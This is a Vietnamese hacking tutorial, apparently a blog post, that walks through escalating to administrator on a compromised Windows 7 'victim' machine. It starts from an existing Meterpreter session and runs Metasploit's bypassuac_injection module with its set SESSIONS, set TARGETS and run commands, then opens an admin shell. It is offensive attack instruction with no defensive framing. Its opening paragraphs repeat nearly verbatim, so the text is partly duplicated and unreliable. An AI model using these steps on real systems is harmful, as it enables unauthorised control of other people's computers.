Chào các bạn
Thông thường khi thâm nhập vào một hệ thống (Từ Windows 7 trở lên) bạn chỉ có quyền là 1 user
Nhưng, một số tác vụ đặc biệt yêu cầu quyền Administrator vì vậy các bạn phải thực hiện kĩ thuật leo thang đặc quyền
Đầu tiên các bạn phải có được meterpreter session. Các bạn có thể xem cách thức thực hiện ở các bài trong khóa học Hacking With Kali Linux
Các bạn có thể kiểm tra quyền của các bạn bằng cách gõ lệnh meterpreter: getsystem. Nếu báo lỗi thì buộc lòng các bạn phải thực hiện kĩ thuật Privilege Escalation
Ở đây tôi dùng msfvenom và Armitage để tấn công (Hướng dẫn cho bạn nào chưa biết xài Armitage)
Trong ví dụ này tôi đã tấn công vào 1 máy chạy Windows 7 và đã có phiên meterpreter. Giờ tôi sẽ gõ getsystem xem sao
use exploit/windows/local/bypassuac_injection
set SESSIONS (Nhập mã phiên Meterpreter của bạn, thường là nếu bạn chỉ tấn công một máy thì gõ set SESSIONS 1)
set TARGETS 0 với máy Victim là Windows 32bit
hoặc
set TARGETS 1 với máy Victim là Windows 64bit
run (Thực thi Module)
Thông thường khi thâm nhập vào một hệ thống (Từ Windows 7 trở lên) bạn chỉ có quyền là 1 user
Nhưng, một số tác vụ đặc biệt yêu cầu quyền Administrator vì vậy các bạn phải thực hiện kĩ thuật leo thang đặc quyền
Đầu tiên các bạn phải có được meterpreter session. Các bạn có thể xem cách thức thực hiện ở các bài trong khóa học Hacking With Kali Linux
Các bạn có thể kiểm tra quyền của các bạn bằng cách gõ lệnh meterpreter: getsystem. Nếu báo lỗi thì buộc lòng các bạn phải thực hiện kĩ thuật Privilege Escalation
Ở đây tôi dùng msfvenom và Armitage để tấn công (Hướng dẫn cho bạn nào chưa biết xài Armitage)
Trong ví dụ này tôi đã tấn công vào 1 máy chạy Windows 7 và đã có phiên meterpreter. Giờ tôi sẽ gõ getsystem xem sao
Thật không may, Armitage đã báo lỗi, do đó chúng ta buộc lòng thực hiện kĩ thuật Privilege Escalation
Ở trong Armitage các bạn chuyển sang tab Console còn ở Metasploit FrameWork các bạn gõ lệnh Background và nhập các lệnh sau
set SESSIONS (Nhập mã phiên Meterpreter của bạn, thường là nếu bạn chỉ tấn công một máy thì gõ set SESSIONS 1)
set TARGETS 0 với máy Victim là Windows 32bit
hoặc
set TARGETS 1 với máy Victim là Windows 64bit
run (Thực thi Module)
Một phiên Meterpreter thứ 2 được mở ra (meterpreter session 2 opened) giờ chúng ta gõ lệnh shell để mở CMD của victim xem sao
Vâng, chúng ta đã có CMD quyền Admin. Chúc các bạn thành công
Video DEMO quá trình tấn công
Video DEMO quá trình tấn công
Không có nhận xét nào:
Đăng nhận xét